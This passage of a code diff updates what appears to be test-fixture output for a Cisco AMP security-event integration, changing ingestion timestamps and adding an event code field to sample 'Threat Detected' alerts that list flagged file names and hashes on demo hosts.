                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251507855229000",
@@ -1607,8 +1626,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853410869Z",
+                "ingested": "2021-09-30T00:14:30.174547286Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251507855229000",
@@ -1690,8 +1710,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853412580Z",
+                "ingested": "2021-09-30T00:14:30.174549297Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251503560262000",
@@ -1788,8 +1809,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853414321Z",
+                "ingested": "2021-09-30T00:14:30.174551390Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251503560262000",
@@ -1875,8 +1897,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853416066Z",
+                "ingested": "2021-09-30T00:14:30.174553415Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251503560262000",
@@ -1973,8 +1996,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853417906Z",
+                "ingested": "2021-09-30T00:14:30.174555596Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251503560262000",
@@ -2060,8 +2084,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853419645Z",
+                "ingested": "2021-09-30T00:14:30.174557637Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251503560262000",
@@ -2158,8 +2183,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853421383Z",
+                "ingested": "2021-09-30T00:14:30.174559708Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251503560262000",
@@ -2241,8 +2267,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853423136Z",
+                "ingested": "2021-09-30T00:14:30.174561746Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6176259028591575000",
@@ -2339,8 +2366,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853424849Z",
+                "ingested": "2021-09-30T00:14:30.174563786Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251439135752000",
@@ -2422,8 +2450,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853426603Z",
+                "ingested": "2021-09-30T00:14:30.174565817Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6176258981346935000",
@@ -2501,8 +2530,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853428347Z",
+                "ingested": "2021-09-30T00:14:30.174567845Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6176258929807327000",
@@ -2590,8 +2620,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853430092Z",
+                "ingested": "2021-09-30T00:14:30.174569865Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533668103677542000",
@@ -2675,8 +2706,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853431831Z",
+                "ingested": "2021-09-30T00:14:30.174571915Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533668103677542000",
@@ -2764,8 +2796,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853433574Z",
+                "ingested": "2021-09-30T00:14:30.174573957Z",
